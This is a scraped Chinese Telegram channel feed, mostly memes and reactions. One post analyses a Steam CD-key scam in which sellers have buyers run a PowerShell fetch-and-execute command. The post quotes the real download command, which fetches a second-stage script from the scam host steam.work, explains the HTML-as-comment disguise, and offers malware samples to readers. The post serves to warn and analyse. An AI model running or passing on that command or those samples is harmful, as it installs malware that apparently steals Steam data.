橘橘橘子汁 & 🍊
12.3K subscribers
1.76K photos
113 videos
19 files
306 links
发一些好玩的

现在成 mb 的私人频道了

Links
t.me/Rosmontis_Daily
t.me/PDChinaNews
Download Telegram
Forwarded from Il Harper
🤣59👍3
🔥53🤣6
Forwarded from 中等偏下傻逼的二次元
被当众喊网名belike:
🥰66🤣31
Forwarded from 心惊报 (投稿机器人)
看来是 有备而来🤓

from Mirraの杂货铺 via NekoMirra
🤣98👍4
🤣107👏18
有因必有果 你的报应就是我
👏35😁7
# 关于 steam.work 激活码诈骗脚本的分析

结论放在前面:如果买 cdkey 买到让你要输入某个脚本再激活的,那别去管他,立刻退货并举报商家!原因就直接贴我写这个就行...

## 正文
刚刚去买了个 cdkey 准备送给朋友,结果一看发货介绍感觉有点不对劲:【图1】
啥啊,irm iex 这不是经典的从网络获取脚本并执行的操作吗,怎么领个激活码还要搞这?

我一开始还以为是自动安装加速器,商家还怪好的捏,直到我激活不了,把这脚本拉下来看了看:【图2】
好家伙 这玩意整了个极其有欺骗性的东西,因为powershell的多行注释正好是<# #>,正好 HTML 文件的开头是 <!DOCTYPE html> 这鸟人给他改成 <#!DOCTYPE html> 就变成 powershell 的注释了.. 我都差点没看出来..网页还做了 UA 判断和跳转,真是够阴损
那么真实的代码就只剩一行了
irm steam.work/pwsDwFile/new1 -OutFile x.ps1

又下文件 这回下了个什么玩意出来?【图三有分析】
我怎么兑换个激活码你还给我注入上 Steam了!有病啊!
那么我们便不得不好奇一下注入的文件里到底干了啥呢,我们下下来....
(好吧我根本下不下来 一下下来就被WD干掉了 根本没有分析的机会哇!最后还是把WD关掉了)
随便分析一下
【图4】咋还有个zlib? 在解压什么?
于是动态调试给他 dump 下来,一看这文件头就是 PE 文件...原来是套娃,下载的两个文件里第二个文件就是加密过的真实病毒数据...又把这个解压出来的东西拿去静态分析
然后发现这里面 啥都没有,而且有三个 .text 段,其中两个都是空的,这也太神奇了吧...链接的几个库只有 sqlite3, bcrypt...等等 这莫不是在写 steam 的数据库?
(草 怎么快三点了 该睡觉了 明天再说!~)
相关样本我会发在评论区 想玩的各位可以玩玩看xD
💯59👍8
橘橘橘子汁 & 🍊
Photo
...pdd 营造的过高素质让我有些无所适从
怎么现在的骗子都这么有礼貌了?
🤣67👍2
吹牛逼没做好功课(
5-2
😁211
锦中客
国风堂 三无MarBlue
歌曲:锦中客 - 国风堂 三无MarBlue
专辑:锦中客
#音乐
🥰7
Forwarded from PIII
🤣151👍4